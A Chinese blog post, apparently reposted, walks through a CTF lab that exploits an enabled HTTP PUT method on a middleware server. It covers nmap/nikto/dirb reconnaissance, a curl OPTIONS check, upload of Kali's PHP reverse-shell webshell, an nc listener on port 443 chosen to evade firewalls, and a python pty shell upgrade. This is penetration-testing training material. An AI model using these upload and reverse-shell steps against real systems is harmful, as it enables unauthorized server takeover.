码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CTF-PUT上传漏洞【超详细】


    前言

    作者简介:不知名白帽,网络安全学习者。

    博客主页:https://blog.csdn.net/m0_63127854?type=blog

    CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html

    网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

    目录

    中间件PUT漏洞介绍

    实验环境

    信息探测

    nmap -sV 192.168.20.137

    nmap -A -v -T4 192.168.20.137

    探测敏感信息

    深入挖掘

    漏洞扫描

    测试PUT漏洞

    对敏感目录进行测试

    上传webshell

    调用kali中的php

    编辑shell.php

    目录上传shell.php

    nc监听端口

    反弹shell

    启动终端


    中间件PUT漏洞介绍

    中间件包括apache、tomcat、IIS、weblogic等这些中间件可以设置支持的HTTP方法(HTTP方法包括GET、POST、HEAD、DELETE、PUT、OPTIONS等)

    每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果间接开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。

    直接上传shell,也可以从侧面反应PUT漏洞的严重危害性。

    实验环境

    kali 192.168.20.128

    靶机 192.168.20.137

    链接:https://pan.baidu.com/s/1UUoIKTbq5UbyAgteYVIjNg 
    提取码:i59h 

    信息探测

    nmap -sV 192.168.20.137

    nmap -A -v -T4 192.168.20.137

    探测敏感信息

    nikto -host http://192.168.20.137

    dirb http://192.168.20.137

    深入挖掘

    发现dirb扫描出两条连接

    打开查看第一条

     

    第一条链接没有有效信息

    打开查看第二条

    是一个空目录,没有有效信息

    漏洞扫描

    owasp-zap扫描漏洞

      

    没有扫描到高危漏洞

    测试PUT漏洞

    对敏感目录进行测试

    curl -v -X OPTIONS http://192.168.20.137/test

    该目录存在PUT漏洞

    上传webshell

    调用kali中的php

    cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php

    编辑shell.php

    端口使用443是为了绕过防火墙

    目录上传shell.php

    下载插件RESTClient

    发现rshell.php被成功上传

    nc监听端口

    nc -nlvp 443

    执行rshell.php

    反弹shell

    发现不是root用户

    启动终端

    echo "import pty;pty.spawn('/bin/bash')" > /tmp/asdf.py

    python /tmp/asdf.py

  • 相关阅读:
    php学生考勤管理毕业设计-附源码080900
    什么是SMTP?它是如何工作的?第1部分
    Java基础:Java类与对象
    码蹄集 - MT3252 - 子序列问题
    深度学习入门(十一)权重衰减
    【前端 Echarts】小白初步学习小结Echarts基本使用
    day58| 739. 每日温度、496.下一个更大元素 I
    百度春招C++后端面经总结
    2023最新计算机信息管理毕设选题分享
    Flink监控和调优笔记
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/126682845
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号